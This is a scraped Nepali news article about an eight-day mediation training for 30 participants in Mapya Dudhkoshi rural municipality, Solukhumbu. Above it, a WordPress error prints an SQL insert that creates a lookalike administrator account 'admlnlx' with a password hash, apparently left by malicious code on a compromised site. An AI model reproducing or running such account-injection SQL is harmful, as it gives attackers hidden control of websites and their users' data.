WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Br8rNrP/nvkLoZ2fnaaPCWEOlHnBJS1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 19:42:36', '', 'admlnlx', 'admlnlx')
गाउँले न्यूज, २६ बैशाख, सोलुखुम्बु । माप्य दुधकोशी गाउँपालिका र असहाय सेवा केन्द्र (सुस) को संमन्वयमा माप्य दुधकोशी गाउँपालिकामा मेलमिलाप सम्बन्धि ८ दिने आधारभूत तालिम सुरु भएको छ ।
माप्य दुधकोशी गाउँपालिका उपाध्यक्ष तथा न्यायिक समितिका संयोजक जुनिता माया मगरको अध्यक्षतामा सञ्चालन भएको उत्घाटन समारोहमा माप्य दुधकोशी गाउँपालिका वडा अध्यक्षहरु नरायाण काजी कार्की, निमराज तामाङ, दिनेश कुमार राई, सजुजित राई साथै माप्य दुधकोशी गाउँपालिकामा बुद्धिजिब महिलाहरुको बाक्लो उपस्तिथि रहेको थियो ।
माप्य दुधकोशी गाउँपालिका वडा नं. दाम्कुमा सञ्चालन भएको तालिममा बरिष्ठ अधिबत्ता उषा मल्ल पाठक र अधिबत्ता बिष्णु माया भूषालले तालिमको सहजिकरण गर्नु भएको छ भने तालिममा ३० जनाको सहभागिता रहेको न्यायिक समितिका संयोजक जुनिता माया मगरले बताए ।
https://gaulenews.com/?p=46495
https://gaulenews.com/?p=46384
https://gaulenews.com/?p=46405